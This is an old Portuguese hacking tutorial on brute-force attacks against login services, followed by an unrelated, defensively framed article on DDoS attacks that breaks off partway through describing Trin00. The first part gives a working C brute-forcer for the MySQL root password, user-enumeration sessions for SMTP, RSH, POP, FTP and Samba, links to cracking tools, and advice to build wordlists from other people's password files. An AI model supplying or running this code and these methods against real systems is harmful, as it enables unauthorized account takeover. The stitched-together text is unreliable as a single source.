nformações Básicas de Ataques de Brutal Force
OBS: Todo material contido neste arquivo texto possui somente proposito
educacional! O Autor nao se responsabiliza por danos causados pelo mesmo!
| IMPLEMENTACOES BASICAS DE BRUTAL FORCES |
-------------------------------------------
* INDICE ----------------------------------
1. INTRODUCAO
2. BRUTAL FORCE 2.1. - WordList
3. TIPOS E TECNICAS 3.1. - Manuais 3.2. - Locais 3.3. - Remotas 3.4. - Problemas e Sugestoes
4. TERMINANDO 4.1 - Links e Referencias. 4.2 - Consideracoes Finais.
1. INTRODUCAO |
Antes de mais nada, quero dizer aos 'elites' de plantao que por favor nao leiam este texto!! Ele eh basico e certamente nao serah util para voce!!! Poupe o seu tempo e vah se encontrar com sua 'turminha' que lah voce aprende mais!!!
Faz tempo que eu 'estou pretendendo' fazer um bom material abordando esse topico 'Brutal Forces', no entanto, estou completamente sem tempo e agora que me engajei em um projeto eh que nao irei ter tempo mesmo!! De modo que irei descrever algumas coisas basicas e talvez num futuro proximo, escreva em mais detalhes e com exemplos as possiveis implementacoes desta tecnica. Conhecimentos basicos de Linux, C e TCP/IP se fazem necessarios, mas como pretendo expor conceitos, ficarah a seu criterio pesquisar isto a fundo ou nao!!!
2. BRUTAL FORCE |
Brutal Force eh um nome dado a uma tecnica fucadora!!! Sim, ao contrario do que muitos pensam e pregam, Brutal Force eh sim uma tecnica!! Ela consiste basicamente em atraves do metodo tentativa/erro procurar obter sucesso em uma determinada investida!! Ou seja, um Brutal Force eh geralmente usado para obter logins e/ou senhas de determinados programas ou servicos.Esta tecnica eh muito ruidosa(deixa muitos rastros e eh de facil percepcao) e deve ser usada com a maxima cautela, no entanto, a grande maioria dos sistemas 'simples' ainda hoje encontram-se mal configurada e, consequentemente, exposta a esta tecnica.
Um Brutal Force representa uma ferramenta(programa) usado com o objetivo de implementar uma investida de 'chutes' de logins e/ou senhas em busca de obter acesso a um sistema! Mas este conceito eh bem mais abrangente, programas 'crackeadores' tambem podem utilizar tecnicas de Brutal Force, no entanto, o objetivo deste texto eh demonstrar algumas situacoes onde o Brutal Force eh usado para se obter um login e/ou uma senha validos e nao desencriptar um programa ou passwd!
O fato de se implementar este conceito com o uso de programas para automatizarem a sua implementacao eh que torna Brutal Force uma tecnica!!! Nao eh tao simples assim criar um Brutal Force para alguns servicos (exemplos: HTTP e SNMP).Em determinados casos chega-se a 'chutar' centenas de milhares de senhas!! Imagine voce 'na mao' chutando de 1 em 1!!! As Ferramentas servem justamente para tornar isto mais rapido, mais comodo e na maioria das vezes retornar 'sucesso' numa investida!
2.1. - WordList
WordList, como o proprio nome diz, se refere a um conjunto(lista) de palavras que geralmente sao usadas atraves do programa 'Brutal Force' como 'chutes' para as tentativas de obtencao de login e/ou senha.Como estamos no 'Brasil', eh recomendavel a alguem que vai implementar esta tecnica, possuir uma boa Wordlist de Nomes(sobrenomes, carros, artistas, times de futebol e etc) usados no Brasil, pois as chances de ser bem sucedido vai depender e muito de uma boa wordlist que deve ser especificada a determinado servidor.. Existem servidores que nao permitem senhas faceis por 'default', logo, uma boa wordlist para esse servidor poderia ser uma que mesclasse "Letras e Numeros" e/ou que nao possuisse menos de X caracteres!
Os programas geradores de Wordlist sao uma verdadeira porcaria!! O que eu recomendo mesmo eh fazer 'na mao', ou seja, pegar alguns 'passwd' de redes ou de amigos e tomar como base elas!!.. Existem repositorios na Internet aonde se pode encontrar Wordlists jah prontas e algumas ateh enormes!! Abaixo seguem links aonde voce poderah encontrar algumas delas:
http://packetstorm.securify.com/Crackers/wordlists/words-english.gz http://packetstorm.securify.com/Crackers/wordlists/words_spanish.gz
3. TIPOS E TECNICAS
Sao varias as possiveis implementacoes desta 'tecnica' e antes que alguem diga que isto aqui eh um verdadeiro 'Manual de Brutal Force para Script Kiddies', eu recomendo a leitura completa deste item! Como eu jah disse acima, a ideia inicial era entrar em detalhes sobre as 'implementacoes', mas o tempo eh curto!
3.1 Manuais
Alguns esquemas podem ser feitos 'na mao', ou seja, sem um programa especifico, no entanto, as chances de se obter sucesso numa investida dessas sao 'poucas'!! Mas eh possivel e muita gente jah conseguiu sucesso numa investida deste tipo.Um implementacao manual poderia ser:
* Um Servidor com Finger e FTP ou Telnet Abertos:
Telnet www.alvo.org 79
Chuta-se varios usuarios e analisa a resposta.Pegando um usuario valido, pode-se chutar o 'Nome, Sobrenome, Telefone ou qualquer outro dado obtido atraves do finger' como possivel senha do usuario num servidor FTP ou Telnet, por exemplo.
3.2 - Locais
Locais representam 'Brutal Forces' quando voce jah possui um acesso local (shell) no sistema.Entao, voce implementa um brutal force para obter acesso a algum 'daemon' ou mesmo a uma conta mais elevada(root)! Varios sao os programas que sao 'suscetiveis' a implementacao de um Brutal Force localmente.Abaixo eu enumero alguns, mas muito cuidado nessas investidas!!!
* MySQL -> Servidores de Banco de Dados, como MySQL sao suscetiveis a
implementacao de tecnicas de Brutal Force.Abaixo segue um simples programa Brutal Force para tentar 'acessar' um Servidor MySQL com usuario 'root':
o nlmysql.c ---------------------------------- /* Simples Brutal Force para Mysql.
Desenvolvido por Nash Leon. nashleon@yahoo.com.br Exemplo simples que procura descobrir senha do usuario 'root'. */
#include
#include
#include
/* Path do mysql. */
#define PATH "/crazy/progs/bd/mysql/bin/mysql"
#define ERRO -1
FILE *senhas;
main(int argc, char *argv[]){
char senha_atual[50];
char buffer[100];
if(argc < 2){
printf("Brutal Force para MySQL by Nash Leon.n"); printf("Uso: %s n",argv[0]); exit(0);
}
senhas = fopen(argv[1],"r");
if (senhas == NULL){
fprintf(stderr,"Erro na Abertura do Arquivo de usuarios!!\n"); exit(ERRO);}
while(fscanf(senhas, "%s", &senha_atual) != EOF){ sprintf(buffer,"%s -u root -p%s",PATH,&senha_atual); system(buffer);
} printf("\nInsucesso na Investida!!\n"); fclose(senhas);
return 0;
}
Eh obvio e evidente que este programa pode ser melhorado, mas ele funciona perfeitamente!!!.. Com uma boa WordList pode-se conseguir com relativa rapidez acesso ao Servidor MySQL como usuario 'root'.Quando ele descobre a senha do root, ele cai dentro do prompt do MySQL, entao, deve-se ter bastante atencao nisso!!
3.3 - Remotas
Remotamente a coisa vai longe!! O leque de possibilidades nao eh pequeno, logo, as chances de implementacao desta tecnica sao grandes!! Existem dezenas de programas que facilitam a 'nossa' vida nessa tarefa!Conhecendo basicamente o daemon(quantidade maxima de tentativas por vez!), voce pode perfeitamente investir um ataque e ser bem sucedido no mesmo! Vou dividir esta implementacao em duas partes, que se seguem abaixo.
3.3.1. - Pega Logins
Em alguns casos, para poupar tempo e recursos, obter os logins validos de uma rede pode ser essencial!! Alguns Daemons seguindo as normas de alguns protocolos nos dao possibilidades de descobrir determinados logins validos que poderao ser uteis na implementacao de outro Brutal Force ou de algum tipo de exploitacao qualquer.Alguns Daemons costumam dizer logo de cara quando se 'chuta' um usuario invalido frases como:'Voce nao eh Bem-Vindo aqui!!' ou 'Usuario Nao Permitido!!'. A resposta dada por um daemon eh essencial para desenvolvermos uma Ferramenta Brutal Force especifica para determinada rede! Mas alguns seguem as normas especificadas nos RFCs e retornam a resposta 'pre-definida' tornando ainda mais facil a implementacao desta tecnica.Abaixo seguem dois possiveis exemplos de Brutal Force em busca de login valido!
* SMTP
Simple Mail Transfer Protocolo eh o protocolo da suite TCP/IP responsavel pelo envio de mensagens eletronicas, no entanto, ele pode ser util para um fucador em busca de obtencao de 'logins validos'.Sao varios os possiveis esquemas para se tentar descobrir um login valido via SMTP, abaixo seguem as 2 tecnicas amplamente difundidas:
+ VRFY -> Esta eh a mais classica, em uma rede com um Servidor SMTP
'default' poderiamos fazer o seguinte para obter logins validos:
telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 localhost ESMTP Sendmail 8.9.3/8.9.3; Wed, 16 Aug 2000 23:38:08 -0300 vrfy nashleon
250 Nash Leon
Note o retorno '250' para um usuario valido.Abaixo segue um exemplo de um usuario invalido:
vrfy carlos
550 carlos... User unknown
'550' eh referencia para 'Insucesso'!
+ EXPN -> Assim como VRFY, EXPN pode nos retornar um login valido, vejamos:
expn root
250
expn carloc
550 carloc... User unknown
Existem outros esquemas para se tentar 'Brutal Force' em SMTP, inclusive a tecnica de 'RCPT TO', mas no entanto sao limitadas e na maioria dos casos tende a falhar!
Existe um programa feito por brasileiros que executa as 2 tecnicas descritas acima e mais esta do 'RCPT TO' que eh bastante eficiente. Abaixo seguem links onde voce pode encontrar o mesmo:
http://stderr.sekure.org/ ou
http://packetstorm.securify.com/UNIX/misc/rcpt-analisys.tgz
Abaixo segue um link para um programa que procura executar somente esta tecnica do 'RCPT TO':
http://packetstorm.securify.com/UNIX/scanners/mailbrute.c
* RSH
Ainda existe servidor usando isto!!!! Impressionante, mas de qualquer forma isto facilita o trabalho de muita gente(inclusive crackers!).Remote Shell eh um servico que executa determinados comandos 'shell' remotamente. O pessoal que manja de IP Spoof sabe muito bem o que ele faz.Mas alem dele ser usado nessas implementacoes ele tambem pode nos fornecer logins validos que mais tarde poderao ser usados em alguma outra tecnica. Abaixo segue a implementacao do esquema:
+ Digita-se na maquina atacante:
rsh -l
+ As respostas variam de sistema para sistema, mas podemos pegar as respostas dadas e saber se um usuario eh valido no sistema, comparando as respostas dada pelo servidor.Por exemplo:
rcmd: localhost: Success
A resposta acima representa em um determinado servidor um usuario invalido!
Permission denied.
Jah esta acima representa que o usuario eh valido no sistema.
Com base nessas informacoes, nos podemos criar um programa brutal force que executa um 'RSH' e pega as respectivas respostas para procurar descobrir um login valido no sistema alvo.
* OUTROS
A Instalacao padrao do Apache em Sistemas Red Hats nos dah uma possibilidade de obtencao de logins validos.Abaixo segue um link para um Brutal Force que executa este esquema:
http://packetstorm.securify.com/web/arse.c
3.3.2. - Pega Senhas
Se voce jah foi bem sucedido em 'capturar' logins validos, entao a coisa comeca a ficar bem mais interessante agora! No entanto, mesmo sem ter pego um login valido, as tecnicas descritas abaixo podem perfeitamente serem implementadas!
* POP
'Popper' eh uma tecnica amplamente difundida e ainda muito usada! Deixa inumeros ruidos, mas ainda assim existem centenas de milhares de servidores suscetiveis a esta tecnica.O protocolo 'PostOffice', em especial a sua versao 3, representa um servico de recebimento de mensagens eletronicas. Voce pode usar um servidor POP para baixar seus e-mails, mas ele tambem pode ser usado para capturar logins e senhas validos, em alguns casos, ateh mesmo shell.
Dois comandos nos ajudam consideravelmente nesta 'missao', sao eles os comandos USER e PASS.Abaixo segue um exemplo de uma tentativa de autenticacao em um servidor POP:
telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK localhost POP3 Server (Version 1.006d) ready at user jose
+OK please send PASS command
pass jose
-ERR invalid usercode or password, please try again quit
+OK localhost POP3 Server (Version 1.006d) shutdown.
Note que ele nos dah uma resposta de erro, e manda tentarmos novamente!! Ora, iremos tentar algumas milhares de vezes se possivel!!. Se voce conseguir sucesso, deverah cair em algo como:
+OK 0 messages ready for nashleon in /var/spool/mail/nashleon
Com um pouco de tato, nao precisamos nem ler o RFC, podemos ver perfeitamente que em caso de sucesso ele retorna '+OK', em caso de falha ele retorna '-ERR'.De posse dessas informacoes eh soh construir um Brutal usando sockets para automatizar esta tecnica! Eu descreve algo ultra-basico sobre isso no 'Tutorial Basico de Programacao de Sockets em C para Linux(I Parte)', mas no entanto, a Internet nos dah varios tipos de programas que executam de forma mais rapida e automatizada o 'popper'. Abaixo segue alguns links onde voce poderah encontrar alguns programas que executam esta tecnicas e um comentario sobre o mesmo:
http://packetstorm.securify.com/groups/ADM/ADM-pop.c
http://www.w00w00.org/files/sectools/popcrack.tgz
* FTP
Os Servidores de FTP tem sido alvo de varias tecnicas no intuito de exploita-los em prol de conseguir acesso a uma determinada rede! Mas eles tambem podem ser 'vitimas' de um ataque de Brutal Force!! Abaixo nos podemos ver uma simples implementacao de uma tentativa de autenticacao em um servidor WU-ftpd:
ftp> o localhost
Connected to localhost.
220 localhost FTP server (Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999) ready.
Name (localhost:nashleon): hacker
331 Password required for hacker.
Password:
530 Login incorrect.
Login failed.
ftp> user nashleon
331 Password required for nashleon.
Password:
230 User nashleon logged in.
Podemos notar que ele nos responde com um '530' quando a tentativa de autenticacao na rede esta incorreta e '230' quando somos bem sucedidos numa investida! Como FTP eh bem variavel, alguns sistemas podem permitir sessoes infinitas, outros 5 e ainda outros 3 ou 1, voce precisa estar atento ao sistema e procurar obter infos sobre isso antes de uma investida!
Abaixo segue link para um excelente Brutal Force para FTP:
http://ADM.freelsd.net/ADM/ADMftpforce.tgz
* TELNET
Essa parte demonstra de forma clara o quao grande pode ser a determinacao de um atacante em obter um acesso a um determinado sistema! Telnet eh um servico inseguro que possui servicos 'alternativos' melhores como ssh. O Telnet alem de prover um canal de facil 'captura' de pacotes por sniffers em modo limpo, pode ser bem util numa investida do tipo Brutal Force.
http://packetstorm.securify.com/Crackers/nirvana.tgz
* HTTP
Temos visto muitos esquemas implementados em cima das definicoes dos RFCs, mas no entanto, o que eu considero um problema maior eh implementar um Brutal Force abrangente para HTTP, pois o numero de respostas possiveis e 'personalizadas' tornam esta tarefa um pouco trabalhosa.Recomendo a criacao de Brutal Force especifico para a Rede Alvo! Abaixo segue um link para um exemplo de um Brutal Force para WEB:
http://rootshell.com/archive-j457nxiqi3gq59dv/199707/brute_web.c.html
* SAMBA
Servidores SAMBA nao fogem a 'regra'.Eles tambem sao suscetiveis a ataques do tipo Brutal Force.Um possivel esquema para a implementacao desta tecnica pode ser o descrito abaixo:
+ Digita-se o seguinte para obter informacoes sobre Servidores e Diretorios:
smbclient -L
Irah entao aparecer infos sobre o 'SERVER' e os diretorios.
+ Em seguida tentar um brutal nos moldes da linha de comando:
smbclient \\\\SERVER\\DIR senha
A resposta quando sucesso eh uma 'queda' dentro do Samba do alvo.
Mas existem programas que automatizam isto de forma bastante eficaz. Existe o NAT(NetBios Auditing Tools) que pode ser obtido em:
ftp://ftp.technotronic.com/microsoft/nat10_tar.gz
Mas eu particularmente prefiro algo mais 'potente' ao meu ver.Um Brutal Force criado pela ADM que automatiza esta tecnica de Brutal Force brilhantemente, abaixo segue o link para o mesmo:
http://ADM.freelsd.net/ADM/ADMsmb-v0.2.tgz
* SNMP
Este servico tem sido alvo de constantes problemas relacionados as implementacoes das 'comunidades' padroes! Muitos administradores nao sao cautelosos ao que se refere 'diminuir a inseguranca' em seus roteadores! Obter acesso a um roteador em muitos casos pode ser conseguir o passwd de um sistema alvo! Dependendo do caso e da 'mente' invasora, pode-se rebotar a maquina, executar comandos remotamente e ateh mesmo 'alterar rotas'!!
Implementar uma tecnica num servidor deste pode ser meio trabalhoso, pois o protocolo usado pelo 'SNMP' eh o UDP, logo geralmente usa-se sockets 'SOCK_DGRAM' sem nenhuma garantia de chegada ou recebimento de pacotes das duas partes envolvidas na autenticacao, alem do proprio servico necessitar de parametros nem um pouco simples como 'determinadas' strings que me fazem ficar 'boiando' quando leio o RFC dele!
Mas para a Comunidade Fucadora, existe um programa que pode nos 'clarear' numa implementacao deste tipo e que eh realmente muito eficiente! Mais uma vez a 'ADM' demonstra na 'pratica' a sua agilidade em fazer programas eficientes e expansivos a varias plataformas.Abaixo segue o link para o Brutal Force deles para 'SNMP':
http://ADM.freelsd.net/ADM/ADMsnmp.0.1.tgz
* IRC
Apesar deu considerar uma implementacao 'inutil', eh possivel atraves da Forca Bruta tentar uma investida para conseguir obter a senha de um canal e ateh mesmo de um nick.Estas tecnicas sao bastante usadas em BOTs criados em Perl que facilitam de forma eficiente um ataque do tipo Brutal Force.Possiveis esquemas para isso sao facilitados atraves da implementacao(pessima e desnecessaria) de servicos como NickServ.Algumas redes, como a brasnet com seus Admins e IRCops inuteis tentam aumentar a 'seguranca' nao permitindo mais de 1 tentativa por sessao, mas se esquecem das outras possiveis implementacoes!! Ou seja, nao existe soh
/msg nickserv identify senha
e
/msg nickserv ghost nick senha
para se investir um brutal force!! Abaixo segue um link para um Brutal Force de IRC para Windows que procura obter senhas de canais de IRC:
http://packetstorm.securify.com/irc/IRCrack09.zip
* MULTIPLOS
Ainda nao para por aih, se o atacante for um verdadeiro 'kamikaze', ele pode ainda tentar uma implementacao conjunta de varios Brutal Forces para varios Servicos ao mesmo tempo! Nao recomendo nunca isto, mas eh um fato a ser considerado, pois pode-se vir a ganhar tempo em alguns casos! Abaixo segue um link para um programa deste tipo:
http://packetstorm.securify.com/Win/brutus-aet2.zip
* OUTROS
Praticamente todos os servicos que autenticam sao vulneraveis em sua instalacao padrao a Implementacoes de Brutal Forces.A menos que seja instalado uma ferramenta IDS capaz de detectar que um servico estah sendo atacado, as inumeras possibilidades descritas acima podem ser implementadas. Alguns servicos sao vulneraveis a Brutal Forces, mas nao possuem Ferramentas de ataque amplamente difundidas e caberah a voce leitor, ir mais fundo nessa vastidao de possiveis Implementacoes!!
Imap e Rlogin sao alguns dos inumeros servicos que nos podemos facilmente construir um 'Brutal Force' para os mesmos.Do outro lado, existem algumas implementacoes que sao mais dificeis como o 'SU' local e o 'SSH', mas nao impossiveis!!! Cabe a cada um de nos ir mais alem do que conhecemos!!
3.4. - Problemas e Sugestoes
Um Brutal Force deve ser evitado! Eh preferivel implementar outras tecnicas um pouco mais complexas, mas bem mais silenciosas do que mandar 'A Forca Bruta'.Existe um ditado bastante valido: 'A Forca Bruta nunca vence a Forca Tecnica'! Um Brutal Force deixa muitos vestigios e consome muito dos sistemas(tanto do alvo como local).Voce muitas vezes corre um serio risco de derrubar um daemon! Nao importa se seja uma rede Com 'Banda Larguissima' ou nao, voce pode sim derrubar o daemon, principalmente se usar uma boa conexao(dedicada) e multiplos sockets! Melhor eh pesquisar e procurar conhecer mais sobre o sistema alvo antes de tentar investir um Brutal!! Hoje em dia, existem ferramentas IDS capazes de perceber um ataque do tipo Brutal Force, e isso nao eh nada bom! Alguns IDS 'derrubam' literalmente o daemon quando ele estah sendo atacado, outros negam chegadas de pacotes vindos do seu endereco e alguns ainda responde num 'ataque' DoS pra cima de tih!! Seja esperto e analise bem a rede antes de investir pesado num brutal force! Cuidado com os 'Fake Servers' que nao fazem outra coisa a nao ser dar respostas invalidas de autenticacao! Voce pode perder muito tempo se nao perceber isto com antecedencia!! Por isso, evite o Brutal Force!
4. TERMINANDO |
Melhor do que simplesmente executar uma bem sucedida investida de 'Brutal Force' eh executar uma bem sucedida investida com um Brutal Force construido por voce! Eh dificil achar Brutal Force especificos para determinados servicos e voce pode ver neste texto algum de minha autoria, no entanto, se um servico permite autenticacao, nem que seja 1 por sessao, voce pode fazer um Brutal para ele! Analise os esquemas e veja se nao pode haver utilidade em se construir um Brutal Force proprio e exclusivo para determinado servico e/ou rede!
4.1 - Links e Referencias.
* Sobre Brutal Force:
http://packetstorm.securify.com/web/arse.c -> WEB Brute http://packetstorm.securify.com/irc/IRCrack09.zip -> Para Canal de IRC. http://packetstorm.securify.com/groups/ADM/ADM-pop.c -> POP http://packetstorm.securify.com/Win/brutus-aet2.zip -> Multiplos For Win. http://packetstorm.securify.com/UNIX/misc/rcpt-analisys.tgz -> SMTP. http://packetstorm.securify.com/Crackers/nirvana.tgz -> Telnet Brutal. http://ADM.freelsd.net/ADM/ADMftpforce.tgz -> Brutal FTP. http://ADM.freelsd.net/ADM/ADMsnmp.0.1.tgz -> Brutal SNMP. http://ADM.freelsd.net/ADM/ADMsmb-v0.2.tgz -> Brutal Samba. ftp://ftp.technotronic.com/microsoft/nat10_tar.gz http://packetstorm.securify.com/UNIX/scanners/mailbrute.c
* Repositorio de Ferramentas:
http://packetstorm.securify.com/
* Home Page Atual do Unsekurity Team:
http://unsekurity.virtualave.net/
* Outros Sites Interessantes:
http://www.taldowin.com.br/
http://www.bufferoverflow.org/
http://www.absoluta.org/
4.2 - Consideracoes Finais.
Como voce pode ver amigo, NewBie, tem muito o que ser dito ainda!! Sao varias e varias as tecnicas usadas por fucadores e os conceitos sao bastante abrangentes!! Eh muito dificil uma pessoa soh dominar a vastidao que o 'hacking' exige de modo que eu recomendo mais do que nunca a troca de informacoes, sejam elas 'eticas' ou 'tecnicas' pois a jornada eh longa! Tem muito o que ser dito e o pessoal do Unsekurity Team vem se comprometendo na medida do possivel ir descrevendo mais sobre o mundo do fucador etico!! Existem varios conceitos dominantes e devemos conhece-los para podermos ser bem sucedidos numa investida qualquer!
Espero que todas as informacoes que eu venho disponibilizando ateh agora
venham a ser uteis para alguem um dia! Nao eh facil escrever algumas
milhares de linhas tecnicas! Os esforcos conjuntos e a uniao dos fucadores
eh que nos faz ter uma conciencia maior na 'Troca de Informacoes' em prol
de uma liberdade maior! Eu soh aprendi isto que descrevo neste texto porque
alguem lah no passado 'clareou' o caminho que eu deveria seguir!
Me lembro quando saiu o programa 'pwdump' e em seguida o 'NTcrack' e na
epoca eu nao conseguia compreender o pleno significado daqueles programas
e hoje olho para eles e vejo que se eu quiser eu faco um igual ou ateh
mesmo melhor!! Sao passos que damos e cada dia aprendemos um pouco mais,
por isso, seja paciente!! Temos muito a aprender ainda e com calma, os
horizontes podem ser expandidos!!
Agradeco a todos do Unsekurity Team e a voce amigo leitor, cada dia que
passa eu venho tendo uma maior conciencia do 'papel' que deve desempenhar
alguem que escreve um texto tecnico voltado ao pessoal que mexe com
hacking!! Nao existe hacking sem etica!! Seja sabio!!
2005
Desenvolvido por Nash Leon vulgo coracaodeleao.
Colaboração e testes: chicomon (XKN)
===========================================
[b]
ATAQUE DDOS
Através do presente artigo, os autores pretendem desmistificar os recentemente famosos ataques DDoS (Distributed Denial of Service), explicando não somente a anatomia do ataque e a forma como ele é orquestrado, mas principalmente dando a conhecer algumas estratégias de como mitigá-lo. São abordados também alguns mecanismos de detecção do ataque e, caso você se torne uma vítima, são apresentadas algumas diretivas de como reagir.
O artigo descreve também, de maneira sucinta, o funcionamento das ferramentas DDoS comumente usadas nos ataques.
INTRODUÇÃO
No último mês, o assunto segurança de redes passou a fazer parte da ordem do dia na imprensa falada e escrita. Na pauta das conversas nos cafés e esquinas das cidades tornou-se comum falar sobre os hackers, os mais recentes ataques que deixaram inacessíveis alguns dos mais famosos web sites, e até mesmo se ouvia falar em ataques de "negação de serviço" (Denial of Service, DoS).
Mas, afinal, o que é um ataque de "negação de serviço"? Os ataques DoS são bastante conhecidos no âmbito da comunidade de segurança de redes. Estes ataques, através do envio indiscriminado de requisições a um computador alvo, visam causar a indisponibilidade dos serviços oferecidos por ele. Fazendo uma analogia simples, é o que ocorre com as companhias de telefone nas noites de natal e ano novo, quando milhares de pessoas decidem, simultaneamente, cumprimentar à meia- noite parentes e amigos no Brasil e no exterior. Nos cinco minutos posteriores à virada do ano, muito provavelmente, você simplesmente não conseguirá completar a sua ligação, pois as linhas telefônicas estarão saturadas.
Ao longo do último ano, uma categoria de ataques de rede tem-se tornado bastante conhecida: a intrusão distribuída. Neste novo enfoque, os ataques não são baseados no uso de um único computador para iniciar um ataque, no lugar são utilizados centenas ou até milhares de computadores desprotegidos e ligados na Internet para lançar coordenadamente o ataque. A tecnologia distribuída não é completamente nova, no entanto, vem amadurecendo e se sofisticando de tal forma que até mesmo vândalos curiosos e sem muito conhecimento técnico podem causar danos sérios. A este respeito, o CAIS tem sido testemunha do crescente desenvolvimento e uso de ferramentas de ataque distribuídas, em várias categorias: sniffers, scanners, DoS.
Seguindo na mesma linha de raciocínio, os ataques Distributed Denial of Service, nada mais são do que o resultado de se conjugar os dois conceitos: negação de serviço e intrusão distribuída. Os ataques DDoS podem ser definidos como ataques DoS diferentes partindo de várias origens, disparados simultânea e coordenadamente sobre um ou mais alvos. De uma maneira simples, ataques DoS em larga escala!.
Os primeiros ataques DDoS documentados surgiram em agosto de 1999, no entanto, esta categoria se firmou como a mais nova ameaça na Internet na semana de 7 a 11 de Fevereiro de 2000, quando vândalos cibernéticos deixaram inoperantes por algumas horas sites como o Yahoo, EBay, Amazon e CNN. Uma semana depois, teve-se notícia de ataques DDoS contra sites brasileiros, tais como: UOL, Globo On e IG, causando com isto uma certa apreensão generalizada.
Diante destes fatos, a finalidade deste artigo é desmistificar o ataque, de modo que administradores e gerentes de sistemas, conhecendo melhor o inimigo, se preparem para combatê-lo.
DESMISTIFICANDO O ATAQUE
OS PERSONAGENS
Quando tratamos de um ataque, o primeiro passo para entender seu funcionamento é identificar os "personagens". Pois bem, parece nãohaver um consenso a respeito da terminologia usada para descrever este tipo de ataque. Assim, esclarece-se que ao longo deste artigo será utilizada a seguinte nomenclatura:
Atacante: Quem efetivamente coordena o ataque.
Master: Máquina que recebe os parâmetros para o ataque e comanda os agentes (veja a seguir).
Agente: Máquina que efetivamente concretiza o ataque DoS contra uma ou mais vítimas, conforme for especificado pelo atacante.
Vítima: Alvo do ataque. Máquina que é "inundada" por um volume enormede pacotes, ocasionando um extremo congestionamento da rede e resultando na paralização dos serviços oferecidos por ela.
Vale ressaltar que, além destes personagens principais, existem outros dois atuando nos bastidores:
Cliente: Aplicação que reside no master e que efetivamente controla os ataques enviando comandos aos daemons. Daemon: Processo que roda no agente, responsável por receber e executar os comandos enviados pelo cliente.
O ATAQUE
O ataque DDoS é dado, basicamente, em três fases: uma fase de "intrusão em massa",na qual ferramentas automáticas são usadas para comprometer máquinas e obteracesso privilegiado (acesso de root). Outra, onde o atacante instala software DDoS nas máquinas invadidas com o intuito de montar a rede deataque. E, por último, a fase onde é lançado algum tipo de flood de pacotes contra uma ou mais vítimas, consolidando efetivamente o ataque.
Fase 1: Intrusão em massa
Esta primeira fase consiste basicamente nos seguintes passos:
É realizado um megascan de portas e vulnerabilidades em redes consideradas "interessantes", como por exemplo, redes com conexões de banda-larga ou com baixo grau de monitoramento.
O seguinte passo é explorar as vulnerabilidades reportadas, com o objetivode obter acesso privilegiado nessas máquinas.
Entre as vítimas preferenciais estão máquinas Solaris e Linux, devido à existência de sniffers e rootkits para esses sistemas. Entre as vulnerabilidades comumente exploradas podemos citar: wu-ftpd, serviços RPC como "cmsd", "statd", "ttdbserverd", "amd", etc.
É criada uma lista com os IPs das máquinas que foram invadidas e que serão utilizadas para a montagem da rede de ataque.
Fase 2: Instalação de software DDoS
Esta fase compreende os seguintes passos:
Uma conta de usuário qualquer é utilizada como repositório para as versões compiladas de todas as ferramentas de ataque DDoS.
Uma vez que a máquina é invadida, os binários das ferramentas de DDoS sãoinstalados nestas máquinas para permitir que elas sejam controladasremotamente. São estas máquinas comprometidas que desempenharão os papeis de masters ouagentes.
A escolha de qual máquina será usada como master e qual comoagente dependerá do critério do atacante. A princípio, o perfil dos master é o de máquinas que não são manuseadas constantemente pelos administradores e muito menos são frequentemente monitoradas. Já o perfil dos agentes é o de máquinas conectadas à Internet por links relativamente rápidos, muito utilizados em universidades e provedores de acesso.
Uma vez instalado e executado o daemon DDoS que roda nos agentes, elesanunciam sua presença aos masters e ficam à espera de comandos (status "ativo").O programa DDoS cliente, que roda nos masters, registra em uma listao IP das máquinas agentes ativas. Esta lista pode ser acessada pelo atacante.
A partir da comunicação automatizada entre os masters e agentes organizam-se os ataques.
Opcionalmente, visando ocultar o comprometimento da máquina e a presençados programas de ataque, são instalados rootkits.
Vale a pena salientar que as fases 1 e 2 são realizadas quase que umaimediatamente após a outra e de maneira altamente automatizada. Assim, são relevantes as informações que apontam que os atacantes podem comprometer uma máquina e instalar nela as ferramentas de ataque DDoS em poucos segundos.
Voilá, tudo pronto para o ataque!!
Fase 3: Disparando o ataque
O atacante controla uma ou mais máquinas master, as quais, por sua vez, podem controlar um grande número de máquinas agentes. É a partir destes agentes que é disparado o flood de pacotes que consolida o ataque. Os agentes ficam aguardando instruções dos masters para atacar um ou mais endereços IP (vítimas), por um período específico de tempo.
Assim que o atacante ordena o ataque, uma ou mais máquinas vítimas são bombardeadas por um enorme volume de pacotes, resultando não apenas na saturação do link de rede, mas principalmente na paralização dos seus serviços.
FERRAMENTAS DE DDoS
Ao contrário do que se pensa, os ataques DDoS não são novos. A primeiraferramenta conhecida com esse propósito surgiu em 1998. Desde então, foram diversas as ferramentas de DDoS desenvolvidas, cada vez mais sofisticadas e com interfáceis mais amigáveis. O que é no mínimo preocupante, pois nos dá uma idéia de quão rápido se movimenta o mundo hacker. A seguir, elas são listadas na ordem em que surgiram:
1. Fapi (1998)
4. TFN (ago/99)
7. TFN2K(dez/99)
2. Blitznet
5. Stacheldraht(set/99)
8. Trank
3. Trin00 (jun/99)
6. Shaft
9. Trin00 win version
Não é propósito deste artigo abordar todas as ferramentas de DDoS disponíveis,mas apenas conhecer o funcionamento básico das principais, que são: Trin00, TFN, Stacheldraht e TFN2K.
TRIN00
O Trin00 é uma ferramenta distribuída usada para lançar ataques DoScoordenados, especificamente, ataques do tipo UDP flood.Para maiores informações a respeito de ataques deste tipo, veja em: http://www.cert.org/advisories/CA-96.01.UDP_service_denial.html
Uma rede Trinoo é composta por um número pequeno de masters e um grande número de agentes.
O controle remoto do master Trin00 é feito através de uma conexão TCPvia porta 27665/tcp. Após conectar, o atacante deve fornecer uma senha(tipicamente, "betaalmostdone").
A comunicação entre o master Trin00e os agentes é feita via pacotes UDP na porta 27444/udpou via pacotes TCP na porta 1524/tcp. A senha padrão para usar os comandosé "l44adsl" e só comandos que contêm a substring "l44" serão processados.
A comunicação entre os agentes e o master Trin00 tambémé através de pacotes UDP, mas na porta 31335/udp.Quando um daemon é inicializado, ele anuncia a sua disponibilidadeenviando uma mensagem ("*HELLO*") ao master,o qual mantém uma lista dos IPs das máquinas agentes ativas, que ele controla.
Tipicamente, a aplicação cliente que roda no master tem sido encontrado sob o nome de master.c, enquanto que os daemons do Trin00 instalados emmáquinas comprometidas têm sido encontrados com uma variedade de nomes, dentre eles: ns, http, rpc.trinoo, rpc.listen, trinix, etc. Tanto o programa cliente (que roda no master) quanto o daemon (que roda no agente) podem ser inicializados sem privilégios de usuário root.
